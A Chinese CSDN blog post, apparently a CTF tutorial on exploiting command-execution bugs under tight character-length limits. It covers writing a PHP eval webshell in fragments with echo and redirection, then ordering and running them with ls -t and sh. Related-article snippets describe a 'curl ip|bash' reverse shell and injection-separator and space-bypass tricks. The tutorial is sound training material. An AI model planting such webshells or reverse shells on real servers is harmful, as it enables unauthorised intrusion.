【ctf】命令执行漏洞(三)

最新推荐文章于 2024-07-25 23:59:49 发布
最新推荐文章于 2024-07-25 23:59:49 发布
阅读量644 收藏
点赞数
分类专栏: ctf 文章标签: linux perl vim php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlllllianqing/article/details/120792437
版权
本文详细介绍了Linux环境中不同长度可控字符下如何利用命令执行漏洞获取shell。通过wget下载空文件,echo配合>和>>写入shell,以及使用w、ls、sh等命令组合,展示了在15位、7位、5位和4位可控字符限制下的技巧。对于极端情况的4位字符,推荐查阅相关博客以了解更多解决方案。
摘要由CSDN通过智能技术生成

命令执行漏洞(三)

15位、7位、5位、4位可控字符下的任意命令执行

15位可控字符
利用原理:

直接下载一个空文件,然后直接将shell分段写入文件中,最后修改文件名来getshell

wget是Linux中的一个下载文件的工具
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

echo可以直接将字符输出到文件中,但需要使用‘>’符号
且第一次输出到文件中时使用‘>’符号,再输入进文件就需要使用‘>>’来进行追加

例如:将一句话写入文件

<?php eval($_GET[1]);

在这里插入图片描述

注意:当遇到符号时,记得使用反斜杠 \ 进行转译
在这里插入图片描述
在这里插入图片描述

7位可控字符

这里我们使用的命令需要更短

w [-fhlsuV][用户名称]
Linux w命令用于显示目前登入系统的用户信息。

执行这项指令可得知目前登入系统的用户有哪些人,以及他们正在执行的程序。

单独执行 w 指令会显示所有的用户,您也可指定用户名称,仅显示某位用户的相关信息。

> 符号—>生成文件名
> a : 以a为文件名写入a
ls > a:以a为文件名写入a和ls的内容

sh:sh命令就是shell

sh a :执行a文件

当我们想输入长命令时,可以使用 \ 来分割

当我们输入命令出现许多字符时,可以使用base64编码的形式来避免字符的问题
在这里插入图片描述

需要注意的一点,反斜杠也需要反斜杠来注释,而且输入命令时需要倒序输出
在这里插入图片描述
在这里插入图片描述

ls -t :将文件按创建的时间排序,这样就可以控制文件的顺序

5位可控字符

如果是5位可控字符,那么前面输入内容也是没有问题的
主要的问题就是

ls -t >a

这里也是通过写入文件的方式来解决该问题
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZYKMAEP8-1634311892684)(C:/Users/16229/AppData/Roaming/Typora/typora-user-images/image-20211015225719194.png)]
最后

sh a 即可
4位可控字符

基本上就是很变态的题目了

这边给个博客来了解了解

https://blog.csdn.net/nzjdsds/article/details/102873203

甜不拉几
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF命令执行题目解题思路
悦分享
08-02 779
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
ctf命令执行漏洞绕过方式小结
小飒的博客
08-06 3732
测试环境: 本地:Win10 phpstudy8.1 kali2020.2 外网:单位提供的linux靶机 一、命令分隔符 %0a – 换行符, %0d – 回车符, ; – 连续指令 && – | – || – 二、空格 < <> %09 $IFS$9 ${IFS} 、读文件 (1)more:一页一页的显示档案内容 (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页 (3)head:查
ctf命令执行漏洞(一)
wlllllianqing的博客
10-12 2129
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
网络安全CTF系列培训教程之Web篇-命令执行漏洞
ctfayang的博客
07-05 507
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。
CTF-web 命令执行漏洞
最新发布
2302_80276789的博客
07-25 240
比如在php里面有一些函数可以操作系统比如system,exec,shell_exec等,加入我们要创建一个abc的目录,我们可以system,这种情况他给定的系统命令是写死的用户没有办法去控制,则不存在漏洞, 当我们数如的东西是可以控制的时候,那么此时就很容易产生漏洞。在控制栏进行ls-l会出来文件的所属用户, 第一个表示文件属性(-是文件,d是目录)后面的表示权限每位表示当前用户,当前组里面的其他用户,其他,的权限,r是可读,w可写,x可执行(execute)。
ctf命令执行漏洞(二)
wlllllianqing的博客
10-15 340
命令执行漏洞(二) 命令执行无回显的判定方法 1.延时 2.http请求 3.dns请求 可使用ping请求,但是nc无法监听ping请求。 linux下的ping不会停止,windows下面的ping会停止 ping -c 3 xxx.xxx.xxx -c 3:ping3次 利用 1.写shell 2.http/dns等方式带出数据 '>'符号:将前面的命令生成的内容写到一个文件中 因为ping ip 是不能出现空格的,所以我们可以构造来消除空格 ...
ctfhub-远程连接命令/代码执行漏洞
ad12456的博客
05-04 891
CTFHub练习
命令执行类型CTF题目总结
Lelouch_E的博客
11-25 1376
命令执行类型CTFphp命令执行buu Online Tool禁止套娃 php命令执行 buu Online Tool 一段php代码审计: 大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellarg和escapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。 如果两方法以上述顺序执行会有绕过漏洞 传入的参数是:172.17.0.2‘ -v -d a=1 经过escapeshellarg处理后变成了’17
个代码执行漏洞的复现
gh0stf1re的博客
04-04 5573
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞
命令执行漏洞(教材:从零到一 CTFer成长之路)
L2329794714的博客
03-18 5742
一、什么是命令执行漏洞 由于开发者使用一些执行命令函数其未对用户输入的数据进行安全检查时,可注入恶意命令,实现恶意命令执行命令执行一般发生在远程,故称远程命令执行RCE(Remote Command Exec或Remote Code Exec)。 以PHP的syste()函数为例: <?php $str = $_GET['name']; system("echo hello ".$str); //调用系统程序执行命令 ?> 正常输入?name=lusong,
命令执行漏洞
weixin_44971601的博客
09-29 1210
RCE漏洞入门基础知识
CTF命令执行篇 与 实际的命令执行漏洞
2301_81556781的博客
07-08 701
7.preg_replace eg:preg_replace(pattern,replacement,subject,limit,count) [其中pattern,replacement,subject 是必填][一般只写command]𝑎𝑟𝑔𝑠:这是一个可变参数列表,用于传递给‘args:这是一个可变参数列表,用于传递给‘callback。:这是一个必须的参数,用于指定要匹配的模式,通常是一个正则表达式。' '|' '-' '(' ')' '反引号' '||' '&&' '&' '}' '{'
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2123
CTFWEB 代码执行&命令执行&CTFSHOW wp
有长度限制的命令执行
feng的博客
03-21 2084
前言 昨天看nepctf的梦里花开牡丹亭那题,最后遇到了有长度限制的命令执行,不过这题的命令执行长度限制在小于10个字符,直接构造即可。但是又想到自己之前还没有仔细学过有长度限制的命令执行,于是好好的来学一下。 9长度限制 也就是这道题了,怎么说呢,单纯的就获得flag来说,直接这样就可以了: n\l /flag 剩下的就还是看接下来更命令执行的思路叭。 7长度限制 来源p神密友圈的7字符命令执行: 小密圈里的那些奇技淫巧 理解一下叭。比如这个命令: echo Y2F0IC9mbGFn|base64
ctf 命令执行总结
njqfb的博客
06-04 2842
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
CTF-ECHO-200格式化字符漏洞+shellcode
BadRer的博客
06-01 2290
很开心有成功做了一道格式化字符串,这题我也不清楚是哪次比赛上的,漏洞还是十分的明显,格式化加个shellcode直接搞定。就是这算的比较麻烦一点。 那么直接进入正题咯! 开干!! 首先拿checksec检查一遍(个人习惯哈) 可以看到,开了栈保护,但是NX disabled,说明堆栈可执行,直接上shellcode,也没有PIE。 先试试水。 应该有格式化漏洞。 IDA反汇
CTF命令执行RCE
qq_53099119的博客
04-02 2874
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTF题目学习记录2
NeverSay_GiveUp的博客
12-04 597
CTF题目学习记录 题目1 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 webshell [目标] 了解php一句话木马、如何使用webshell [环境] windows [工具] firefox、hackbar、CKnife webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将 其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服 务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行(RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行(RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值